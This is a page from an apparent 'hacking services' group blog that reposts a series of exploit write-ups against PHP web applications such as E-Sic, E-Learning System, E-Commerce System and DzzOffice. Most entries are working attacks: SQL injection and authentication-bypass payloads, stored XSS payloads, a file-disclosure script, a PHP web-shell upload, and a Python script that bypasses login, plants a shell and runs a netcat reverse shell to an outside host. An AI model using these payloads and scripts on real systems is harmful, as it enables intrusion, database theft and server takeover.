Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863153554

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# # # # # 
# Vulnerability: Admin Login Bypass & SQLi
# Date: 15.01.2017
# Vendor Homepage: http://www.e-soft24.com/
# Script Name: Jokes Portal Script Seo
# Script Version: v1.3
# Script Buy Now: http://www.e-soft24.com/jokes-portal-script-seo-p-370.html
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# http://localhost/[PATH]/siteadmin/ and set Username:anything and Password to 'or''=' and hit enter.
# # # # #
HireHackking 
# Exploit Title: E-Sic Software livre CMS - Cross Site Scripting#
Date: 12/10/2017# Exploit Author: Elber Tavares
# fireshellsecurity.team/
# Vendor Homepage: https://softwarepublico.gov.br/# Version: 1.0#
Tested on: kali linux, windows 7, 8.1, 10 - Firefox# Download
https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More informations:
http://whiteboyz.xyz/esic-software-publico-xss.html

O XSS está presente na área de cadastro de solicitante,
onde é possivel injetar códigos pelo input que recebe o nome do usuário

---------------------------------------------------------------------

Url: http://localhost/esic/index/

POST: http://localhost/cadastro/index.php
DATA:
DATA: tipopessoa=F&nome=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&
cpfcnpj=CPFAQUI&idfaixaetaria=&idescolaridade=&profissao=&
idtipotelefone=&dddtelefone=&telefone=&email=aaaaa%40gmail.com&
confirmeemail=aaaaa%40gmail.com&idlogradouro=&cep=&logradouro=&bairro=&cidade=&
uf=&numero=&complemento=&acao=Salvar
HireHackking 
# Exploit Title: E-Sic Software livre CMS - Autentication Bypass#
Date: 12/10/2017# Exploit Author: Elber Tavares# Vendor Homepage:
https://softwarepublico.gov.br/# Version: 1.0# Tested on: kali linux,
windows 7, 8.1, 10 - Firefox# Download
https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More informations:
http://whiteboyz.xyz/esic-software-publico-autentication-bypass.html

The vulnerability is in the login area of e-sic,
where we can enter the panel only using some parameters such as
username and password
---------------------------------------------------------------------
PoC:
Url: http://vulnsite/esic/index/ User: '=''or' Pass: '=''or'
POST: http://vulnsite/esic/index/index.php
DATA: login=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btsub=Entrar
HireHackking 
# Exploit Title: E-Sic Software livre CMS - Blind SQL Injection
# Date: 12/10/2017
# Exploit Author: Guilherme Assmann
# Vendor Homepage: https://softwarepublico.gov.br/
# Version: 1.0
# Tested on: kali linux, windows 7, 8.1, 10 - Firefox
# Download https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More informations: https://k33r0k.wordpress.com/2017/10/12/e-sic-sql-injection/#more-398

The vulnerability is in the search private area of e-sic without authentication
---------------------------------------------------------------------
Poc:
  Url: http://vulnerable/esiclivre/restrito/inc/lkpcep.php?q=1

  Parameter: q (GET)

  Payload: 1' AND (SELECT * FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT DISTINCT(HEX(IFNULL(CAST(schema_name AS CHAR),0x20))) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 13,1),11,1))>1,0,5)))))oslN)-- UACx

  sqlmap -v 5 -u "http://localhost/esiclivre/restrito/inc/lkpcep.php?q=1" --level 5 --random-agent --hex --dbs
HireHackking 
# Exploit Title: E-Sic Software livre CMS - Sql Injection
# Date: 12/10/2017
# Exploit Author: Elber Tavares
# fireshellsecurity.team/
# Vendor Homepage: https://softwarepublico.gov.br/
# Version: 1.0
# Tested on: kali linux, windows 7, 8.1, 10 - Firefox
# Download
https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More informations:

http://whiteboyz.xyz/esic-software-publico-sql-injection.html

Vulnerability is in the zip code search script
---------------------------------------------------------------------

Url: http://localhost/esiclivre/restrito/inc/buscacep.php


DATA:

Parameter: f (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: f=-1932' OR 5987=5987 AND 'dtev'='dtev

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: f=test' OR SLEEP(5) AND 'kucr'='kucr

    Type: UNION query
    Title: MySQL UNION query (random number) - 6 columns
    Payload: f=test' UNION ALL SELECT 3344,3344,

CONCAT(0x7162627a71,0x54657946565941494562654c437570647a4f4e53616744546e526663454152424e71506e564d6853,0x71786a6a71),
    3344,3344,3344#
HireHackking 
# Exploit Title: E-Sic Software livre CMS - Sql Injection
# Date: 12/10/2017
# Exploit Author: Elber Tavares
# fireshellsecurity.team/
# Vendor Homepage: https://softwarepublico.gov.br/
# Version: 1.0
# Tested on: kali linux, windows 7, 8.1, 10 - Firefox
# Download: https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More informations:

http://whiteboyz.xyz/esic-software-publico-sql-injection.html

vulnerability is in the password reset parameter of the software,
where we can send sql parameters and interact directly with the
database. "Informe seu CPF ou CNPJ para enviarmos nova senha:"
---------------------------------------------------------------------

Url: http://vulnerablesite/esic/reset/

POST: cpfcnpj=test&btsub=Enviar

Parameter: cpfcnpj (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: cpfcnpj=test' UNION ALL SELECT NULL,NULL,CONCAT(CONCAT
    ('qbqqq','HMDStbPURehioEoBDmsawJnddTBZoNxMrwIeJWFR'),'qzbpq'),NULL,NULL--
GJkR&btsub=Enviar
HireHackking 
# Exploit Title: E-Registrasi Pencak Silat 18.10 - 'id_partai' SQL Injection
# Exploit Author: Ihsan Sencan
# Dork: N/A
# Date: 2018-10-11
# Vendor Homepage: https://sourceforge.net/projects/eregistrasi-kejuaraan-silat/
# Software Link: https://sourceforge.net/projects/eregistrasi-kejuaraan-silat/files/latest/download
# Version: 18.10
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/nilai/monitor_nilai.php?id_partai=[SQL]
 
%31%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%4e%55%4c%4c%2c%4e%55%4c%4c%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%40%78%29%46%52%4f%4d%28%53%45%4c%45%43%54%28%40%78%3a%3d%30%78%30%30%29%20%2c%28%53%45%4c%45%43%54%28%40%78%29%46%52%4f%4d%28%61%64%6d%69%6e%29%57%48%45%52%45%28%40%78%29%49%4e%28%40%78%3a%3d%43%4f%4e%43%41%54%28%30%78%32%30%2c%40%78%2c%30%78%35%35%37%33%36%35%37%32%32%30%34%39%34%34%33%61%2c%75%73%65%72%49%64%2c%30%78%33%63%36%32%37%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%36%65%36%31%36%64%36%35%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%33%63%36%32%37%32%33%65%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%36%32%37%32%33%65%29%29%29%29%78%29%29%2d%2d
HireHackking 
# Exploit Title: E-Negosyo System 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/bsenordering_9-23-18.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18801

# POC: 
# 1)
# http://localhost/[PATH]/student/index.php?view=view&id=[SQL]
# 
GET /[PATH]/index.php?q=product&category=Cakes%27%20%20UNION%20SELECT%201,2,3,4,5,6,7,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),9,10,11,12,13,14,15,16,17,18,19,20--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 20:24:30 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

# POC: 
# 2)
# http://localhost/[PATH]/index.php?q=single-item&id=[SQL]
# ....
HireHackking 
# Exploit Title: E-Learning System 1.0 - Authentication Bypass & RCE
# Exploit Author: Himanshu Shukla & Saurav Shukla
# Date: 2021-01-15
# Vendor Homepage: https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/caiwl.zip
# Version: 1.0
# Tested On: Kali Linux + XAMPP 7.4.4
# Description: E-Learning System 1.0 - Authentication Bypass Via SQL Injection + Remote Code Execution

#Step 1: run the exploit in python with this command: python3 exploit.py
#Step 2: Input the URL of the vulnerable application: Example: http://10.10.10.23/caiwl/
#Step 3: Input your LHOST where you want the reverse shell: Example: 10.9.192.23
#Step 4: Input your LPORT that is the port where the reverse shell will spawn: Example: 4444
#Step 5: Start a Netcat Listener on the port specified in Step 4 using this command: nc -lnvp 4444
#Step 6: Hit enter on the  if your Netcat Listener is ready, and you will get a reverse shell as soon as you hit enter.

import requests

print('########################################################')
print('##                 E-LEARNING SYSTEM 1.0              ##')
print('##   AUTHENTICATION BYPASS & REMOTE CODE EXECUTION    ##')
print('########################################################')

print('Author - Himanshu Shukla & Saurav Shukla')

GREEN =  '\033[32m' # Green Text
RED =  '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults
#Create a new session
s = requests.Session() 
  
#Set Cookie
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}

LINK=input("Enter URL of The Vulnarable Application : ")

#Authentication Bypass
print("[*]Attempting Authentication Bypass...")
values = {"user_email":"'or 1 or'", "user_pass":"lol","btnLogin":""}
r=s.post(LINK+'admin/login.php', data=values, cookies=cookies) 

r=s.post(LINK+'admin/login.php', data=values, cookies=cookies) 

#Check if Authentication was bypassed or not.
logged_in = True if("You login as Administrator." in r.text) else False
l=logged_in
if l:
	print(GREEN+"[+]Authentication Bypass Successful!", RESET)
else:
	print(RED+"[-]Failed To Authenticate!", RESET)


#Creating a PHP Web Shell

phpshell  = {
               'file': 
                  (
                   'shell.php', 
                   '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 
                   'application/x-php', 
                  {'Content-Disposition': 'form-data'}
                  ) 
             }

# Defining value for form data
data = {'LessonChapter':'test', 'LessonTitle':'test','Category':'Docs','save':''}



#Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
upload = s.post(LINK+'/admin/modules/lesson/controller.php?action=add', cookies=cookies, files=phpshell, data=data, verify=False)

shell_upload = True if("window.location='index.php'" in upload.text) else False
u=shell_upload
if u:
	print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
else:
	print(RED+"[-]Failed To Upload The PHP Shell!", RESET)

print("[*]Please Input Reverse Shell Details")
LHOST=input("[*]LHOST : ")
LPORT=input("[*]LPORT : ")

print('[*]Start Your Netcat Listener With This Command : nc -lvnp '+LPORT)
input('[*]Hit Enter if your netcat shell is ready. ')
print('[+]Deploying The Web Shell...')


#Executing The Webshell
e=s.get('http://192.168.1.5/caiwl/admin/modules/lesson/files/shell.php?cmd=nc 192.168.1.2 9999 -e /bin/bash', cookies=cookies)

exit()
HireHackking 
# Exploit Title: e-learning Php Script 0.1.0 - 'search' SQL Injection
# Date: 2020-06-29
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage: https://github.com/amitkolloldey/elearning-script
# Software Link: https://github.com/amitkolloldey/elearning-script
# Version: 0.1.0
# Tested on: Kali Linux

Source code(search.php):
                     <?php
                     if(isset($_GET['search_submit'])){
                     $search_key = $_GET['search'];
                     $search = "select * from posts where post_keywords 
like '%$search_key%'";
                     $run_search = mysqli_query($con,$search);
                     $count = mysqli_num_rows($run_search);
                     if($count == 0){
                     echo "<h2>No Result Found.Please Try With Another 
Keywords.</h2>";
                     }else{
                     while($search_row = 
mysqli_fetch_array($run_search)):
                     $post_id = $search_row ['post_id'];
                     $post_title = $search_row ['post_title'];
                     $post_date = $search_row ['post_date'];
                     $post_author = $search_row ['post_author'];
                     $post_featured_image = $search_row ['post_image'];
                     $post_keywords = $search_row ['post_keywords'];
                     $post_content = substr($search_row 
['post_content'],0,200);
                     ?>

Payload:
         http://127.0.0.1/e/search.php?search=a&search_submit=Search
         http://127.0.0.1/e/search.php?search=a'OR (SELECT 3475 
FROM(SELECT COUNT(*),CONCAT(0x716b787171,(SELECT 
(ELT(3475=3475,1))),0x7171787871,FLOOR(RAND(0)*2))x FROM 
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IsDG&search_submit=Search
HireHackking 
# Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)
# Google Dork: NA
# Date: 28-03-2024
# Exploit Author: Sandeep Vishwakarma
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html
# Version: v1.0
# Tested on: Windows 10
# Description: Stored Cross Site Scripting vulnerability in E-INSUARANCE -
v1.0 allows an attacker to execute arbitrary code via a crafted payload to
the Firstname and lastname parameter in the profile component.

# POC:
1. After login goto http://127.0.0.1/E-Insurance/Script/admin/?page=profile
2. In fname & lname parameter add payolad
"><script>alert("Hacked_by_Sandy")</script>
3. click on submit.

# Reference:
https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29411.md
HireHackking 
Advisory:  E-Detective Lawful Interception System
    multiple security vulnerabilities
Date:    14/06/2015
CVE:    unassigned
Authors:  Mustafa Al-Bassam (https://musalbas.com)
    slipstream/RoL (https://twitter.com/TheWack0lian)
Software:  Decision Group E-Detective Lawful Interception System
Vendor URL:  http://www.edecision4u.com/

Software description:

"E-Detective is a real-time Internet interception, monitoring and
forensics system that captures, decodes, and reconstructs various types
of Internet traffic. It is commonly used for organization Internet
behavioural monitoring, auditing, record keeping, forensics analysis, and
investigation, as well as, legal and lawful interception for lawful
enforcement agencies such as Police Intelligence, Military Intelligence,
Cyber Security Departments, National Security Agencies, Criminal
Investigation Agencies, Counter Terrorism Agencies etc."

Vulnerabilities:

1) Unauthenticated Local File Disclosure

-----
Proof-of-concept:
https://github.com/musalbas/edetective-poc/blob/master/pwned-detective.py

# Proof-of-concept for unauthenticated LFD in E-Detective.
# Authors: Mustafa Al-Bassam (https://musalbas.com)
#          slipstream/RoL (https://twitter.com/TheWack0lian)

import argparse
import base64
import urllib2


def display_banner():
    print """
                              _        
                             | |       
 _ ____      ___ __   ___  __| |______ 
| '_ \ \ /\ / / '_ \ / _ \/ _` |______|
| |_) \ V  V /| | | |  __/ (_| |       
| .__/ \_/\_/ |_| |_|\___|\__,_|       
| |                                    
|_|                                    
     _      _            _   _           
    | |    | |          | | (_)          
  __| | ___| |_ ___  ___| |_ ___   _____ 
 / _` |/ _ \ __/ _ \/ __| __| \ \ / / _ \\
| (_| |  __/ ||  __/ (__| |_| |\ V /  __/
 \__,_|\___|\__\___|\___|\__|_| \_/ \___|
"""

argparser = argparse.ArgumentParser(description='Proof-of-concept for unauthenticated LFD in E-Detective.')
argparser.add_argument('hostname', help='hostname to pwn')
argparser.add_argument('file', help='path to file on server to grab')


def encode(text):
    encoded = ''

    for i in range(len(text)):
        encoded += chr(ord(text[i]) + 40)

    encoded = base64.b64encode(encoded)
    return encoded


def poc(hostname, file):
    return http_read('https://' + hostname + '/common/download.php?file=' + encode(file))


def http_read(url):
    return urllib2.urlopen(url).read()

if __name__ == "__main__":
    display_banner()
    args = argparser.parse_args()
    print poc(args.hostname, args.file)


-----



The /common/download.php in the web root allows for an unauthenticated
user to read any file on the system that the web user has access to.
This includes database credentials and any traffic intercepts captured
by the system.

The "file" parametre is "protected" by inadequate "cipher": base64
followed by rot40, which is trivially reversible.

2) Authenticated Remote Code Execution

The restore feature in the "config backup" page extracts a .tar file
encrypted with OpenSSL blowfish into the root directory (/) as root.

The .tar file should be encrypted with the static key "/tmp/.charlie".
Yes, that's the actual key - they pass the wrong argument to OpenSSL.
They used -k instead of -kfile, thus the key is the path of the key file
rather than the contents of the key file.

This enables an attacker to upload a shell into the web root, or
overwrite any system files such as /etc/shadow.
HireHackking 
# Exploit Title: E-Commerce System 1.0 - Unauthenticated Remote Code Execution
# Exploit Author: SunCSR (Sun* Cyber Security Research - ThienNV)
# Date: 2020-05-14
# Vendor Homepage: https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/ecommerce.zip
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.5
# Description: E-Commerce System Using PHP/MySQLi - Unauthenticated Remote Code Execution + Unauthenticated SQL Injection

### Description: E-Commerce System Using PHP/MySQLi - Unauthenticated
Remote Code Execution + Unauthenticated SQL Injection

###POC 1: Unauthenticated Remote Code Execution via Unrestricted file upload

Vulnerabilities url: http://thiennv.com/ecommerce/index.php?q=profile
Exploitation:

POST /ecommerce/customer/controller.php?action=photos HTTP/1.1
Host: thiennv.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0)
Gecko/20100101 Firefox/76.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------270177040916945863071313890828
Content-Length: 4723
Origin: http://thiennv.com
Connection: close
Referer: http://thiennv.com/ecommerce/index.php?q=profile
Cookie: advanced_ads_hide_deactivate_feedback=1; wplc_chat_status=5;
_icl_current_language=en; nc_status=browsing; tcx_customerID=rJQlLlHFcU;
wplc_cid=Bk4eLeHFcI_1589362760300; PHPSESSID=909kc73hdpc69l5vk6malipke7
Upgrade-Insecure-Requests: 1

-----------------------------270177040916945863071313890828
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1000000
-----------------------------270177040916945863071313890828
Content-Disposition: form-data; name="photo"; filename="logo1.php"
Content-Type: image/png

‰PNG


IHDR   á   á   m"H   &PLTEÝ=1ÿÿÿ
<?php phpinfo() ?>
-----------------------------270177040916945863071313890828
Content-Disposition: form-data; name="savephoto"


-----------------------------270177040916945863071313890828--

###POC 2: Unauthenticated SQL Injection

Vulnerabilities url:
http://192.168.17.65:80/ecommerce/index.php?q=product&category=-2854'
Exploitation:

Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload:
http://192.168.17.65:80/ecommerce/index.php?q=product&category=-2854' OR
6075=6075#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
    Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category='
OR (SELECT 2158 FROM(SELECT COUNT(*),CONCAT(0x71706a7a71,(SELECT
(ELT(2158=2158,1))),0x7170767671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FBZp

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category='
AND (SELECT 5509 FROM (SELECT(SLEEP(5)))dkZy)-- vkPi

    Type: UNION query
    Title: MySQL UNION query (NULL) - 20 columns
    Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category='
UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7a71,0x644764427169434a594a57726f4a744c517a58554b59485152524842596454684f4d504d6d644868,0x7170767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
[11:22:17] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[11:22:17] [INFO] fetching database names
available databases [6]:
[*] db_ecommerce
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
-------------------------------------------------------------------------------------------------------------Best
Regards!
(*Mr) Ngo Van Thien*
HireHackking 
# # # # # 
# Exploit Title: E-commerce MLM Software 1.0 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/e-commerce-mlm/
# Demo: http://74.124.215.220/~advaemlm/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/service_detail.php?pid=[SQL]
# 
# -6'++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--+-
# 
# 
# 2)
# http://localhost/[PATH]/event_detail.php?eventid=[SQL]
# 
# -18'++UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6,7--+-
# 
# 
# 3)
# http://localhost/[PATH]/news_detail.php?newid=[SQL]
# 
# -27'++UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=0x6d6c6d5f61646d696e)AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR+1,2,0x30),0x3a20,column_name,0x3c62723e)))))x),3,4,5,6--+-
# 
# 
# # # # #
HireHackking 
# Exploit Title: DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty, g3ck0dr1v3r
# Date: 04/23/2021
# Vendor: http://www.dzzoffice.com/
# Link: https://github.com/zyx0814/dzzoffice
# CVE: CVE-2021-3318

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-3318

from selenium import webdriver
import time
import os


#enter the link to the website you want to automate login.
website_link="http://localhost/dzzoffice/user.php?mod=login"

#enter your login username
username="admin@dzzoffice.com"

#enter your login password
password="password"

#enter the element for username input field
element_for_username="email"
#enter the element for password input field
element_for_password="password"
#enter the element for submit button
element_for_submit="loginsubmit"

# Dai brauzura aaa ta eba
browser = webdriver.Chrome() #uncomment this line,for chrome users

# Otvarai da ne vlazam s kasata
browser.get((website_link))

# Run...
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element  = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)

### Login
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

### Exploit
#time.sleep(3)
element_for_natrutvanie="admin_password"
laina="http://localhost/dzzoffice/admin.php?mod=appmarket&op=cloudappmarket"
browser.get((laina))

### Next level... :)
os.system("python poc_login_1.py")

print("payload is deployed_0...\n")
except Exception:

#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")

### os.system

#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-3318

from selenium import webdriver
import time


#enter the link to the website you want to automate login.
website_link="http://localhost/dzzoffice/admin.php?mod=setting"

#enter your login username
username="admin@dzzoffice.com"

#enter your login password
password="password"


#enter the element for username input field
element_for_username="admin_email"

#enter the element for password input field
element_for_password="admin_password"

#enter the element for submit button
element_for_submit="submit"

# Dai brauzura aaa ta eba
browser = webdriver.Chrome() #uncomment this line,for chrome users

# Otvarai da ne vlazam s kasata
browser.get((website_link))

# Run...
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element  = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)

### Login
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

### Exploit
time.sleep(3)
element_for_natrutvanie="settingsubmit"
laina="http://localhost/dzzoffice/admin.php?mod=setting"
browser.get((laina))

### Inner text...
browser.execute_script("document.querySelector('[name=\"settingnew[metakeywords]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'")
browser.execute_script("document.querySelector('[name=\"settingnew[sitebeian]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'")
browser.execute_script("document.querySelector('[name=\"settingnew[metadescription]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'")
browser.execute_script("document.querySelector('[name=\"settingnew[statcode]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'")

time.sleep(5)

# Submit exploit
signInButton = browser.find_element_by_name(element_for_natrutvanie)
signInButton.click()

print("payload is deployed_1...\n")
except Exception:

#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")
HireHackking 
[+] Credits: John Page AKA hyp3rlinx	
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/DZSOFT-v4.2.7-PHP-EDITOR-FILE-ENUMERATION.txt
[+] ISR: ApparitionSec            
 


Vendor:
==============
www.dzsoft.com



Product:
=========================
DzSoft PHP Editor v4.2.7

DzSoft PHP Editor is a tool for writing and testing PHP and HTML pages.



Vulnerability Type:
====================
File Enumeration




CVE Reference:
==============
N/A

 

Security Issue:
================
DzSoft comes with a built-in web server used to preview PHP files, the built-in web server is prone to file enumeration
attacks when combining "HEAD" method HTTP requests with directory traversal "\../../" type attacks. This can aid attackers
in information gathering (File enumeration) to help in possibly furthering attacks.

On install DzSoft users get Windows network warning like:

"Allow Dzsoft to communicate on these networks:"

Private networks, such as my home or work network

Public networks, such as those in airports and coffee shops (not recommended).

This selection will create Firewall rule and determine remote connections allowed to DzSoft editors built-in server.
Then when remote user make HTTP request to DzSoft they will get HTTP 403 Forbidden from the built-in web server. 

e.g.

curl  -v "http://VICTIM-IP/\../mysql/data/mysql.pid"


< HTTP/1.1 403 Forbidden
< Content-Type: text/html
< Content-Length: 1554
<
<HTML>
<HEAD>
  <TITLE>403 Forbidden</TITLE>
</HEAD>
<BODY>
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<H1>Forbidden</H1>
<p>For security reasons, you cannot access the built-in web server of DzSoft PHP Editor from another computer.</p>
<p>If you see this message within DzSoft PHP Editor's window, or if you think that there might be reasons to enable access from other computers,
</BODY>
</HTML>
* Connection #0 to host x.x.x.x left intact



However, this 403 Forbidden access control can be bypassed by malicious users to "stat" files in and outside the webroot.

e.g. mysql directory.

File enumeration Conditions: 

These setting is found under Run / Run Options / Paramaters tab

a) DZSoft built-in web server is running 
b) DZSoft built-in web servers "REMOTE_HOST=x.x.x.x" and "REMOTE_ADDR=x.x.x.x" is set to a real IP other than localhost.

For POC create and save a PHP file under XAMPP/htdocs and run DzSoft built-in web server in preview mode.

Next make request for "mysql/my-huge.ini" to see if exists.


C:\>curl  -v -I "http://VICTIM-IP/\../mysql/my-huge.ini"
*   Trying VICTIM-IP...
* Connected to VICTIM-IP (VICTIM-IP) port 80 (#0)
> HEAD /\../mysql/my-huge.ini HTTP/1.1
> User-Agent: curl/7.41.0
> Host: VICTIM-IP
> Accept: */*
>
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Content-Type:
Content-Type:
< Content-Length: 5057
Content-Length: 5057
< Cache-Control: no-cache
Cache-Control: no-cache


Checking for "mysql.pid"
/////////////////////////


C:\>curl  -v -I "http://VICTIM-IP/\../mysql/data/mysql.pid"
*   Trying VICTIM-IP...
* Connected to VICTIM-IP (VICTIM-IP) port 80 (#0)
> HEAD /\../mysql/data/mysql.pid HTTP/1.1
> User-Agent: curl/7.41.0
> Host: VICTIM-IP
> Accept: */*
>
